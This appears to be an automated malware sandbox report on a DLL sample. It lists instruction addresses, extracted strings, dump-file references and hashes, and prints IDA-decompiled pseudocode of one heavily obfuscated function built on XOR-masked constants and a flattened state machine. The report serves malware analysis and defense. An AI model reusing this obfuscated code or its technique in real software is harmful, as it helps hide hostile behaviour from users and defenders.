0x02b3a889
0x02b3a894
0x02b3a89f
0x02b3a8aa
0x02b3a8b5
0x02b3a8c0
0x02b3a8cb
0x02b3a8d6
0x02b3a8e1
0x02b3a8ec
0x02b3a8f7
0x02b3a902
0x02b3a90d
0x02b3a918
0x02b3a923
0x02b3a92b
0x02b3a938
0x02b3a93c
0x02b3a943
0x02b3a94a
0x02b3a94d
0x02b3a951
0x02b3a959
0x02b3a96f
0x02b3a976
0x02b3a981
0x02b3a98c
0x02b3a997
0x02b3a99f
0x02b3a9aa
0x02b3a9bc
0x02b3a9c1
0x02b3a9ca
0x02b3a9d5
0x02b3a9e0
0x02b3a9e8
0x02b3a9f0
0x02b3a9f8
0x02b3aa00
0x02b3aa08
0x02b3aa0d
0x02b3aa17
0x02b3aa18
0x02b3aa1c
0x02b3aa24
0x02b3aa2c
0x02b3aa34
0x02b3aa39
0x02b3aa41
0x02b3aa49
0x02b3aa54
0x02b3aa5f
0x02b3aa6a
0x02b3aa72
0x02b3aa80
0x02b3aa84
0x02b3aa8c
0x02b3aa97
0x02b3aaad
0x02b3aab2
0x02b3aabb
0x02b3aac6
0x02b3aad8
0x02b3aadd
0x02b3aae6
0x02b3aaf1
0x02b3aafc
0x02b3ab04
0x02b3ab0c
0x02b3ab17
0x02b3ab23
0x02b3ab28
0x02b3ab2e
0x02b3ab3b
0x02b3ab3c
0x02b3ab40
0x02b3ab48
0x02b3ab55
0x02b3ab59
0x02b3ab61
0x02b3ab66
0x02b3ab6e
0x02b3ab79
0x02b3ab84
0x02b3ab8f
0x02b3ab97
0x02b3ab9f
0x02b3aba4
0x02b3abac
0x02b3abbf
0x02b3abc6
0x02b3abd1
0x02b3abd9
0x02b3abde
0x02b3abe6
0x02b3abea
0x02b3abf2
0x02b3abfd
0x02b3ac08
0x02b3ac13
0x02b3ac27
0x02b3ac2e
0x02b3ac39
0x02b3ac44
0x02b3ac4c
0x02b3ac59
0x02b3ac5d
0x02b3ac65
0x02b3ac70
0x02b3ac7b
0x02b3ac86
0x02b3ac91
0x02b3ac99
0x02b3aca1
0x02b3acab
0x02b3acaf
0x02b3acb7
0x02b3acc2
0x02b3accd
0x02b3acd8
0x02b3ace9
0x02b3acec
0x02b3acf0
0x02b3acf5
0x02b3acfd
0x02b3ad05
0x02b3ad10
0x02b3ad1b
0x02b3ad26
0x02b3ad31
0x02b3ad3c
0x02b3ad47
0x02b3ad52
0x02b3ad5d
0x02b3ad68
0x02b3ad7b
0x02b3ad82
0x02b3ad8d
0x02b3ad95
0x02b3ad9d
0x02b3ada5
0x02b3adaa
0x02b3adb2
0x02b3adba
0x02b3adc2
0x02b3adca
0x02b3add2
0x02b3ade8
0x02b3adf7
0x02b3adfa
0x02b3ae01
0x02b3ae0c
0x02b3ae14
0x02b3ae19
0x02b3ae21
0x02b3ae29
0x02b3ae34
0x02b3ae3f
0x02b3ae4a
0x02b3ae55
0x02b3ae5d
0x02b3ae6a
0x02b3ae6e
0x02b3ae76
0x02b3ae89
0x02b3ae90
0x02b3ae9b
0x02b3aeae
0x02b3aebd
0x02b3aec4
0x02b3aecf
0x02b3aeda
0x02b3aee5
0x02b3aef0
0x02b3af04
0x02b3af0b
0x02b3af16
0x02b3af21
0x02b3af2c
0x02b3af37
0x02b3af42
0x02b3af57
0x02b3af65
0x02b3af6a
0x02b3af73
0x02b3af7e
0x02b3af89
0x02b3af91
0x02b3af9c
0x02b3afa8
0x02b3afad
0x02b3afb3
0x02b3afbb
0x02b3afc3
0x02b3afcb
0x02b3afdd
0x02b3afe0
0x02b3afe7
0x02b3aff2
0x02b3affd
0x02b3b010
0x02b3b017
0x02b3b022
0x02b3b02d
0x02b3b035
0x02b3b040
0x02b3b04b
0x02b3b058
0x02b3b05c
0x02b3b064
0x02b3b069
0x02b3b071
0x02b3b079
0x02b3b086
0x02b3b08a
0x02b3b08f
0x02b3b097
0x02b3b09f
0x02b3b0a7
0x02b3b0af
0x02b3b0b7
0x02b3b0c2
0x02b3b0ca
0x02b3b0d5
0x02b3b0e0
0x02b3b0e8
0x02b3b0f3
0x02b3b0fe
0x02b3b10e
0x02b3b115
0x02b3b120
0x02b3b133
0x02b3b13a
0x02b3b142
0x02b3b14d
0x02b3b155
0x02b3b159
0x02b3b161
0x02b3b169
0x02b3b171
0x02b3b176
0x02b3b17e
0x02b3b186
0x02b3b191
0x02b3b19c
0x02b3b1a7
0x02b3b1b4
0x02b3b1b8
0x02b3b1c0
0x02b3b1ca
0x02b3b1d8
0x02b3b1dd
0x02b3b1e3
0x02b3b1eb
0x02b3b1f3
0x02b3b1fe
0x02b3b209
0x02b3b214
0x02b3b21f
0x02b3b22a
0x02b3b235
0x02b3b240
0x02b3b24b
0x02b3b253
0x02b3b25e
0x02b3b270
0x02b3b275
0x02b3b27e
0x02b3b289
0x02b3b294
0x02b3b2a6
0x02b3b2ab
0x02b3b2bc
0x02b3b2bf
0x02b3b2c6
0x02b3b2d1
0x02b3b2e4
0x02b3b2eb
0x02b3b2f6
0x02b3b301
0x02b3b309
0x02b3b314
0x02b3b324
0x02b3b32d
0x02b3b330
0x02b3b33c
0x02b3b340
0x02b3b348
0x02b3b35a
0x02b3b35d
0x02b3b364
0x02b3b36f
0x02b3b377
0x02b3b37f
0x02b3b384
0x02b3b389
0x02b3b391
0x02b3b39c
0x02b3b3a7
0x02b3b3b2
0x02b3b3ba
0x02b3b3c2
0x02b3b3cf
0x02b3b3d3
0x02b3b3e2
0x02b3b3e7
0x02b3b3ee
0x02b3b3ee
0x02b3b3f0
0x02b3b3f0
0x02b3b3f0
0x02b3b3f0
0x02b3b3f6
0x00000000
0x00000000
0x02b3b3fc
0x02b3b668
0x02b3b66e
0x02b3b66f
0x00000000
0x02b3b402
0x02b3b408
0x02b3b5b7
0x02b3b5c0
0x02b3b5c4
0x02b3b5da
0x02b3b61d
0x02b3b629
0x02b3b640
0x02b3b645
0x02b3b648
0x00000000
0x02b3b40e
0x02b3b414
0x02b3b57a
0x02b3b599
0x02b3b5a5
0x02b3b5aa
0x02b3b5ad
0x00000000
0x02b3b41a
0x02b3b420
0x02b3b473
0x02b3b49b
0x02b3b4bc
0x02b3b4c9
0x02b3b4cd
0x02b3b4d4
0x02b3b523
0x02b3b543
0x02b3b548
0x02b3b561
0x02b3b567
0x02b3b568
0x02b3b56a
0x02b3b570
0x00000000
0x02b3b570
0x02b3b422
0x02b3b428
0x00000000
0x02b3b814
0x02b3b434
0x00000000
0x02b3b43a
0x02b3b451
0x02b3b457
0x02b3b458
0x00000000
0x02b3b458
0x00000000
0x02b3b434
0x02b3b420
0x02b3b414
0x02b3b408
0x02b3b81f
0x02b3b81f
0x00000000
0x02b3b81f
0x02b3b679
0x02b3b67f
0x02b3b7d3
0x02b3b7d8
0x02b3b7db
0x02b3b7dc
0x02b3b7de
0x02b3b7ea
0x00000000
0x02b3b7e0
0x02b3b7e0
0x00000000
0x02b3b7e0
0x00000000
0x02b3b685
0x02b3b685
0x02b3b68b
0x02b3b78e
0x02b3b79c
0x02b3b7a6
0x02b3b7ae
0x02b3b7af
0x00000000
0x02b3b691
0x02b3b691
0x02b3b697
0x02b3b753
0x02b3b767
0x02b3b76e
0x02b3b773
0x02b3b776
0x00000000
0x02b3b69d
0x02b3b69d
0x02b3b6a3
0x00000000
0x02b3b6a9
0x02b3b6c3
0x02b3b6ca
0x02b3b6cf
0x02b3b6ed
0x02b3b71c
0x02b3b723
0x02b3b728
0x02b3b72b
0x02b3b72d
0x02b3b733
0x00000000
0x02b3b733
0x02b3b72d
0x02b3b6a3
0x02b3b697
0x02b3b68b
0x00000000
0x02b3b7ef
0x02b3b7ef
0x02b3b7ef
0x00000000

Strings

h, xrefs: 02B3ABA4
l+}, xrefs: 02B3B309
\\, xrefs: 02B3AA54
/e, xrefs: 02B3ABEA
B:, xrefs: 02B3AC44
~63, xrefs: 02B3B753
HMJ9, xrefs: 02B3AFE7
$P, xrefs: 02B3A936
xs,, xrefs: 02B3AAF1
uv, xrefs: 02B3AE55
QGgf, xrefs: 02B3ADBA
9, xrefs: 02B3B176
2iJ, xrefs: 02B3B022
!., xrefs: 02B3AE4A
K, xrefs: 02B3B186
BbJ, xrefs: 02B3A981
~63, xrefs: 02B3AF4D, 02B3AC1E, 02B3AF5E
N , xrefs: 02B3ACB7
05, xrefs: 02B3AEE5

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: h$!.$$P$/e$05$2iJ$B:$BbJ$HMJ9$K$N $QGgf$\\$uv$xs,$~63$~63$9$l+}
API String ID: 0-4215899151
Opcode ID: 43a8b4eac5ab8fe6655b26cf994f788cdebc44f637a06c64bf84f05e2200cea4
Instruction ID: 84739ffed9cedd32b7a73c4a82cbb50417d85faf0b5e6edb14d4560fe1b6e601
Opcode Fuzzy Hash: 43a8b4eac5ab8fe6655b26cf994f788cdebc44f637a06c64bf84f05e2200cea4
Instruction Fuzzy Hash: DC72EF725093819FD379CF21D58AB8BBBE2BBC4348F10891DE5D996260DBB19948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B40F86, Relevance: 23.2, Strings: 18, Instructions: 723
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E02B40F86(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				void* _t824;
				void* _t825;
				void* _t829;
				void* _t832;
				void* _t844;
				void* _t850;
				void* _t853;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				void* _t882;
				void* _t901;
				void* _t957;
				intOrPtr _t975;
				intOrPtr* _t978;
				signed int _t980;
				signed int _t981;
				void* _t982;
				intOrPtr _t986;
				void* _t987;
				void* _t994;
				void* _t996;

				_t978 = __ecx;
				_v96 = __ecx;
				_v88 = 0xce16ef;
				_t986 = 0;
				_t853 = 0x87433f6;
				_v84 = 0;
				_v80 = 0;
				_v412 = 0xef09b0;
				_v412 = _v412 + 0xffff239a;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0xffffb1af;
				_v412 = _v412 ^ 0xffffb567;
				_v144 = 0xb2550e;
				_v144 = _v144 << 6;
				_v144 = _v144 ^ 0x2c954380;
				_v160 = 0xa1df5c;
				_v160 = _v160 * 0x60;
				_v160 = _v160 ^ 0x3cb3c280;
				_v288 = 0x7a32d8;
				_v288 = _v288 | 0x8c6c9666;
				_v288 = _v288 ^ 0x041f8caf;
				_v288 = _v288 ^ 0x88613a51;
				_v348 = 0xdf5e12;
				_v348 = _v348 | 0xa5ea5eb7;
				_v348 = _v348 ^ 0xa5ff5eb7;
				_v296 = 0x7009ff;
				_v296 = _v296 + 0xffff1527;
				_v296 = _v296 + 0x576a;
				_v296 = _v296 ^ 0x006f7690;
				_v372 = 0x1f54b;
				_t860 = 0x52;
				_v372 = _v372 * 0x5a;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 / _t860;
				_v372 = _v372 ^ 0x00000044;
				_v332 = 0x772df1;
				_v332 = _v332 + 0x4853;
				_v332 = _v332 ^ 0x166147d5;
				_v332 = _v332 ^ 0x16163191;
				_v240 = 0x1a1abb;
				_v240 = _v240 ^ 0xbdfc81b5;
				_v240 = _v240 | 0x1ef02f35;
				_v240 = _v240 ^ 0xbff6bf3f;
				_v232 = 0x620327;
				_v232 = _v232 + 0xffffc934;
				_t861 = 0x13;
				_v232 = _v232 / _t861;
				_v232 = _v232 ^ 0x000525b3;
				_v208 = 0xe2fff2;
				_t980 = 0x39;
				_v208 = _v208 * 0x78;
				_v208 = _v208 ^ 0x6a67f970;
				_v344 = 0xf3734c;
				_v344 = _v344 >> 0x10;
				_v344 = _v344 / _t980;
				_v344 = _v344 ^ 0x00000004;
				_v300 = 0x170e40;
				_v300 = _v300 | 0xfbde795f;
				_v300 = _v300 ^ 0xfbde9330;
				_v260 = 0xd4f3ae;
				_v260 = _v260 ^ 0x9e22b963;
				_v260 = _v260 * 0x2e;
				_v260 = _v260 ^ 0x904fea8f;
				_v356 = 0x4c8d9b;
				_v356 = _v356 | 0xd47535dd;
				_v356 = _v356 + 0xffffd433;
				_t862 = 0x64;
				_v356 = _v356 * 0x59;
				_v356 = _v356 ^ 0xdfa15942;
				_v308 = 0xbd9260;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 * 0x79;
				_v308 = _v308 ^ 0x000cbe7b;
				_v252 = 0xa2f51d;
				_v252 = _v252 + 0x749;
				_v252 = _v252 << 0xd;
				_v252 = _v252 ^ 0x5f854687;
				_v292 = 0x216e58;
				_v292 = _v292 / _t862;
				_v292 = _v292 + 0xffff8880;
				_v292 = _v292 ^ 0xfff3b1bc;
				_v176 = 0xac4eb4;
				_v176 = _v176 | 0xd866b52c;
				_v176 = _v176 ^ 0xd8e8b8b7;
				_v236 = 0x7a6201;
				_v236 = _v236 ^ 0x2461ec4e;
				_t863 = 0xa;
				_v236 = _v236 * 0x35;
				_v236 = _v236 ^ 0x79bb4b53;
				_v220 = 0xf5a9fb;
				_v220 = _v220 << 1;
				_v220 = _v220 >> 5;
				_v220 = _v220 ^ 0x000a39a7;
				_v380 = 0x7beff6;
				_v380 = _v380 / _t863;
				_v380 = _v380 | 0x5a206f9b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x7c9823d9;
				_v284 = 0xdc7201;
				_v284 = _v284 ^ 0xec4f9d75;
				_v284 = _v284 << 8;
				_v284 = _v284 ^ 0x93e140b6;
				_v396 = 0x36b797;
				_v396 = _v396 + 0x83f2;
				_v396 = _v396 | 0xb5da4ffa;
				_v396 = _v396 ^ 0x8c9f27f1;
				_v396 = _v396 ^ 0x3962cb66;
				_v364 = 0x608af6;
				_v364 = _v364 >> 0xe;
				_v364 = _v364 ^ 0xb06c2668;
				_v364 = _v364 >> 0xa;
				_v364 = _v364 ^ 0x0022b374;
				_v404 = 0xe18b1f;
				_v404 = _v404 + 0xffff49de;
				_v404 = _v404 + 0xffffa950;
				_v404 = _v404 >> 5;
				_v404 = _v404 ^ 0x000802e7;
				_v168 = 0x720eed;
				_v168 = _v168 | 0xf4577aa8;
				_v168 = _v168 ^ 0xf4704e8f;
				_v328 = 0x5e39f;
				_v328 = _v328 * 0x2a;
				_v328 = _v328 ^ 0x47860790;
				_v328 = _v328 ^ 0x47706e69;
				_v336 = 0xdd3db6;
				_v336 = _v336 ^ 0x0be1064e;
				_v336 = _v336 ^ 0xe0fa941c;
				_v336 = _v336 ^ 0xebc1ff07;
				_v340 = 0x8bacdf;
				_t864 = 0x49;
				_v340 = _v340 / _t864;
				_t865 = 0x77;
				_v340 = _v340 * 0x4d;
				_v340 = _v340 ^ 0x0099a7e7;
				_v440 = 0x29fcf0;
				_v440 = _v440 >> 4;
				_v440 = _v440 ^ 0x37539152;
				_v440 = _v440 / _t865;
				_v440 = _v440 ^ 0x007580f6;
				_v400 = 0x753dd5;
				_v400 = _v400 ^ 0x142a6b84;
				_v400 = _v400 ^ 0x6d30c2ad;
				_v400 = _v400 ^ 0xe014bebf;
				_v400 = _v400 ^ 0x997c2220;
				_v128 = 0x8b3cd;
				_v128 = _v128 << 2;
				_v128 = _v128 ^ 0x002b9a55;
				_v408 = 0x5fd2f;
				_v408 = _v408 >> 9;
				_t866 = 0x69;
				_v408 = _v408 * 0x53;
				_v408 = _v408 * 0x58;
				_v408 = _v408 ^ 0x00501640;
				_v416 = 0x7e5e32;
				_v416 = _v416 | 0x37c3b1cb;
				_v416 = _v416 + 0x4e4b;
				_v416 = _v416 | 0xc7e68b70;
				_v416 = _v416 ^ 0xffec3e94;
				_v304 = 0xac72e0;
				_v304 = _v304 + 0xffff9516;
				_v304 = _v304 | 0x0ab72207;
				_v304 = _v304 ^ 0x0aba1474;
				_v424 = 0x91a63a;
				_v424 = _v424 | 0xeda6ffa9;
				_v424 = _v424 ^ 0xa7761782;
				_v424 = _v424 << 0xe;
				_v424 = _v424 ^ 0x7a08e30a;
				_v436 = 0x9e7f8b;
				_v436 = _v436 | 0x84ca61f6;
				_v436 = _v436 << 2;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 ^ 0xb78cfbfa;
				_v216 = 0x303808;
				_v216 = _v216 + 0xef78;
				_v216 = _v216 / _t980;
				_v216 = _v216 ^ 0x000455e2;
				_v312 = 0x19b522;
				_v312 = _v312 << 7;
				_v312 = _v312 ^ 0x11162953;
				_v312 = _v312 ^ 0x1dcfd305;
				_v212 = 0x8a6fc0;
				_v212 = _v212 << 9;
				_v212 = _v212 ^ 0x14d4ca12;
				_v276 = 0xdb7845;
				_v276 = _v276 / _t866;
				_v276 = _v276 * 0x1c;
				_v276 = _v276 ^ 0x003237f1;
				_v124 = 0x91e545;
				_t867 = 0x7b;
				_v124 = _v124 / _t867;
				_v124 = _v124 ^ 0x0004745c;
				_v192 = 0x2154b3;
				_v192 = _v192 ^ 0x5324a52c;
				_v192 = _v192 ^ 0x530d1a47;
				_v140 = 0x7913eb;
				_v140 = _v140 | 0xe487e648;
				_v140 = _v140 ^ 0xe4fd51cb;
				_v428 = 0x8a554f;
				_v428 = _v428 << 1;
				_v428 = _v428 + 0xffff493d;
				_v428 = _v428 | 0x8f4663f4;
				_v428 = _v428 ^ 0x8f592165;
				_v200 = 0x5c4830;
				_v200 = _v200 + 0xffffe35d;
				_v200 = _v200 ^ 0x00549f8c;
				_v132 = 0x6e2e79;
				_t377 =  &_v132; // 0x6e2e79
				_t981 = 0x62;
				_v132 =  *_t377 / _t981;
				_v132 = _v132 ^ 0x000a369f;
				_v244 = 0x1d0d9a;
				_t868 = 0x6e;
				_v244 = _v244 / _t868;
				_v244 = _v244 ^ 0xec9a9004;
				_v244 = _v244 ^ 0xec94e609;
				_v148 = 0xd4a92;
				_v148 = _v148 + 0xffffbc3f;
				_v148 = _v148 ^ 0x00088ca7;
				_v184 = 0x3666a0;
				_v184 = _v184 >> 0xb;
				_v184 = _v184 ^ 0x00096f18;
				_v228 = 0x713966;
				_v228 = _v228 << 3;
				_v228 = _v228 << 0xb;
				_v228 = _v228 ^ 0x4e5b426e;
				_v316 = 0xec09e9;
				_v316 = _v316 << 7;
				_t869 = 0x78;
				_v316 = _v316 / _t869;
				_v316 = _v316 ^ 0x00fe5880;
				_v268 = 0x8ffe81;
				_v268 = _v268 + 0xffff4311;
				_v268 = _v268 ^ 0x56e15418;
				_v268 = _v268 ^ 0x566a144b;
				_v324 = 0x9f4c2e;
				_v324 = _v324 >> 4;
				_v324 = _v324 | 0x903f3b4d;
				_v324 = _v324 ^ 0x9031b6d7;
				_v196 = 0x6080cf;
				_v196 = _v196 << 0xe;
				_v196 = _v196 ^ 0x203ba000;
				_v256 = 0x4bba45;
				_v256 = _v256 + 0xc17c;
				_v256 = _v256 | 0x95e268b8;
				_v256 = _v256 ^ 0x95e68234;
				_v264 = 0x7821fc;
				_v264 = _v264 << 3;
				_t870 = 0x34;
				_v264 = _v264 / _t870;
				_v264 = _v264 ^ 0x001694e5;
				_v204 = 0x96f3a5;
				_v204 = _v204 * 0x24;
				_v204 = _v204 ^ 0x153e3a4b;
				_v368 = 0xbef911;
				_t871 = 0xe;
				_v368 = _v368 / _t871;
				_v368 = _v368 >> 0xb;
				_v368 = _v368 + 0x5de4;
				_v368 = _v368 ^ 0x00021c01;
				_v376 = 0x377d04;
				_v376 = _v376 + 0xcef;
				_v376 = _v376 ^ 0x9e466b70;
				_t872 = 0x59;
				_v376 = _v376 * 0x6b;
				_v376 = _v376 ^ 0x399834bf;
				_v180 = 0x6632ea;
				_v180 = _v180 | 0x3a3e38fd;
				_v180 = _v180 ^ 0x3a73a81b;
				_v248 = 0x142cd9;
				_v248 = _v248 / _t872;
				_v248 = _v248 / _t981;
				_v248 = _v248 ^ 0x0001d965;
				_v188 = 0x88b8e9;
				_v188 = _v188 + 0xffff5f5f;
				_v188 = _v188 ^ 0x0087927e;
				_v164 = 0x9c013d;
				_t873 = 0xa;
				_v164 = _v164 / _t873;
				_v164 = _v164 ^ 0x0004ead6;
				_v172 = 0x53b5f1;
				_v172 = _v172 + 0xd9f2;
				_v172 = _v172 ^ 0x005588af;
				_v360 = 0xd6ac8a;
				_v360 = _v360 | 0xfdf9fa5f;
				_v360 = _v360 ^ 0xfdfecc4d;
				_v224 = 0xfb951e;
				_v224 = _v224 + 0xffff2e4c;
				_v224 = _v224 + 0x8dcd;
				_v224 = _v224 ^ 0x00f1d24a;
				_v272 = 0x6e5d6f;
				_v272 = _v272 << 2;
				_t874 = 0x6f;
				_v272 = _v272 / _t874;
				_v272 = _v272 ^ 0x000d7a86;
				_v384 = 0x15dc31;
				_v384 = _v384 + 0xfffffc55;
				_v384 = _v384 << 0x10;
				_v384 = _v384 >> 0xa;
				_v384 = _v384 ^ 0x003c4753;
				_v392 = 0x7bc513;
				_v392 = _v392 * 0x54;
				_v392 = _v392 | 0xe01c3b63;
				_v392 = _v392 + 0xe1b2;
				_v392 = _v392 ^ 0xe89c6b16;
				_v420 = 0x6862b7;
				_v420 = _v420 ^ 0x841c6550;
				_v420 = _v420 + 0xd52;
				_v420 = _v420 >> 0x10;
				_v420 = _v420 ^ 0x000e8d54;
				_v388 = 0x19484a;
				_t982 = 0x6f661e6;
				_t875 = 0x68;
				_v388 = _v388 / _t875;
				_t876 = 0xd;
				_v92 = 0x100;
				_v388 = _v388 * 0x61;
				_v388 = _v388 << 6;
				_v388 = _v388 ^ 0x05e5c873;
				_v432 = 0xb160;
				_v432 = _v432 * 0x78;
				_v432 = _v432 >> 8;
				_v432 = _v432 ^ 0xee0de4a9;
				_v432 = _v432 ^ 0xee0e3c37;
				_v320 = 0x436488;
				_v320 = _v320 * 0x7d;
				_v320 = _v320 * 0x24;
				_v320 = _v320 ^ 0xa0a81f1c;
				_v136 = 0x73af31;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x0004ab53;
				_v120 = 0xd23217;
				_v120 = _v120 | 0x86b48086;
				_v120 = _v120 ^ 0x86fe303d;
				_v280 = 0x567562;
				_v280 = _v280 / _t876;
				_v280 = _v280 + 0xffff7ef5;
				_v280 = _v280 ^ 0x00098751;
				_v152 = 0x24c9f6;
				_v152 = _v152 + 0x7f22;
				_v152 = _v152 ^ 0x002f2944;
				_v156 = 0xe548b;
				_v156 = _v156 + 0xe219;
				_v156 = _v156 ^ 0x000a95de;
				_v352 = 0xccf4e9;
				_v352 = _v352 | 0x0ed71748;
				_v352 = _v352 + 0xefd9;
				_v352 = _v352 << 3;
				_v352 = _v352 ^ 0x770f1835;
				while(1) {
					L1:
					while(1) {
						L2:
						while(1) {
							L3:
							_t957 = 0xaefec99;
							do {
								while(1) {
									L4:
									_t996 = _t853 - 0x89f995e;
									if(_t996 > 0) {
										break;
									}
									if(_t996 == 0) {
										E02B4C237(_v108, _v432, _v320, _v136);
										_t853 = 0xc502d5f;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t853 == 0x49f634) {
											_push(_v308);
											_push(_v356);
											_push(_v260);
											_t832 = E02B4E1F8(0x2b313d8, _v300, __eflags);
											_push(_v236);
											_push(_v176);
											_push(_v292);
											__eflags = E02B3738A(_v220, _t832, _v380, _v412,  &_v112, E02B4E1F8(0x2b31318, _v252, __eflags), _v284) - _v144;
											_t853 =  ==  ? 0xc917448 : 0x468e224;
											E02B4FECB(_t832, _v396, _v364, _v404, _v168);
											E02B4FECB(_t833, _v328, _v336, _v340, _v440);
											_t978 = _v96;
											_t987 = _t987 + 0x44;
											goto L31;
										} else {
											if(_t853 == 0x1281fcd) {
												E02B32EBF(_v420, _v104, _v388);
												_t853 = 0x89f995e;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t853 == _t824) {
													_push(_v212);
													_push(_v312);
													_push(_v216);
													_t985 = E02B4E1F8(0x2b31368, _v436, __eflags);
													_t901 = 0x48;
													_v100 = 0x2b31368;
													_t844 = E02B516C0(_v276, 0x2b31368, _v116,  &_v100, _v124, _v192, _t841, _v140, _v428, _t901, _v372, _v200, _v132,  &_v76);
													_t994 = _t987 + 0x3c;
													__eflags = _t844 - _v332;
													if(_t844 != _v332) {
														_t853 = 0xc502d5f;
													} else {
														_t975 =  *0x2b56224; // 0x0
														E02B4C9B0(_v244, _t975 + 8, _v148, 0x40,  &_v68, _v184);
														_t994 = _t994 + 0x10;
														_t853 = 0x9badbc8;
													}
													E02B4FECB(_t985, _v228, _v316, _v268, _v324);
													_t987 = _t994 + 0xc;
													L31:
													_t982 = 0x6f661e6;
													_t824 = 0x38eaa65;
													_t882 = 0xe81b6a7;
													_t957 = 0xaefec99;
													goto L32;
												} else {
													if(_t853 == 0x5c5114f) {
														E02B3F7FE(_v156, _v112, _v352, _v344);
													} else {
														if(_t853 == _t982) {
															_t850 = E02B33431(_v104);
															_t853 = 0x1281fcd;
															__eflags = _t850;
															_t986 =  !=  ? 1 : _t986;
															while(1) {
																L1:
																L2:
																L3:
																_t957 = 0xaefec99;
																goto L4;
															}
														} else {
															if(_t853 != 0x87433f6) {
																goto L32;
															} else {
																_t853 = 0x49f634;
																continue;
															}
														}
													}
												}
											}
										}
									}
									L35:
									return _t986;
								}
								__eflags = _t853 - 0x9badbc8;
								if(__eflags == 0) {
									_push(_v204);
									_push(_v264);
									_push(_v256);
									__eflags = E02B3BC32( *((intOrPtr*)(_t978 + 4)),  &_v108, _v240, _v368, _v376, E02B4E1F8(0x2b31368, _v196, __eflags),  *_t978, _v180, _v248, _v112, 0x2b31368, _v188) - _v232;
									_t853 =  ==  ? 0xaefec99 : 0xc502d5f;
									E02B4FECB(_t819, _v164, _v172, _v360, _v224);
									_t987 = _t987 + 0x40;
									goto L31;
								} else {
									__eflags = _t853 - _t957;
									if(_t853 == _t957) {
										_t825 = E02B351E7( &_v104, _v272, _v116, _v108, _v208, _v384, _v392);
										_t987 = _t987 + 0x14;
										__eflags = _t825;
										_t853 =  ==  ? _t982 : 0x89f995e;
										goto L1;
									} else {
										__eflags = _t853 - 0xc502d5f;
										if(_t853 == 0xc502d5f) {
											E02B4C237(_v116, _v120, _v280, _v152);
											_t853 = 0x5c5114f;
											while(1) {
												L1:
												goto L2;
											}
										} else {
											__eflags = _t853 - 0xc917448;
											if(_t853 == 0xc917448) {
												_v100 = _v92;
												_t829 = E02B543E6(_v400, _v128, _v408, _v112, _v416, _v160,  &_v116, _v92);
												_t987 = _t987 + 0x18;
												__eflags = _t829 - _v288;
												_t882 = 0xe81b6a7;
												_t824 = 0x38eaa65;
												_t853 =  ==  ? 0xe81b6a7 : 0x5c5114f;
												goto L3;
											} else {
												__eflags = _t853 - _t882;
												if(_t853 != _t882) {
													goto L32;
												} else {
													__eflags = E02B4C2CF(_v304, _v348, _v424, _v116) - _v296;
													_t824 = 0x38eaa65;
													_t853 =  ==  ? 0x38eaa65 : 0xc502d5f;
													goto L2;
												}
											}
										}
									}
								}
								goto L35;
								L32:
								__eflags = _t853 - 0x468e224;
							} while (__eflags != 0);
							goto L35;
						}
					}
				}
			}

0x02b40f90
0x02b40f92
0x02b40f99
0x02b40fa6
0x02b40fa8
0x02b40fad
0x02b40fb4
0x02b40fbb
0x02b40fc3
0x02b40fcb
0x02b40fd0
0x02b40fd8
0x02b40fe0
0x02b40feb
0x02b40ff3
0x02b40ffe
0x02b41013
0x02b4101a
0x02b41025
0x02b41030
0x02b4103b
0x02b41046
0x02b41051
0x02b41059
0x02b41061
0x02b41069
0x02b41074
0x02b4107f
0x02b4108a
0x02b41095
0x02b410a2
0x02b410a5
0x02b410a9
0x02b410b6
0x02b410ba
0x02b410bf
0x02b410ca
0x02b410d5
0x02b410e0
0x02b410eb
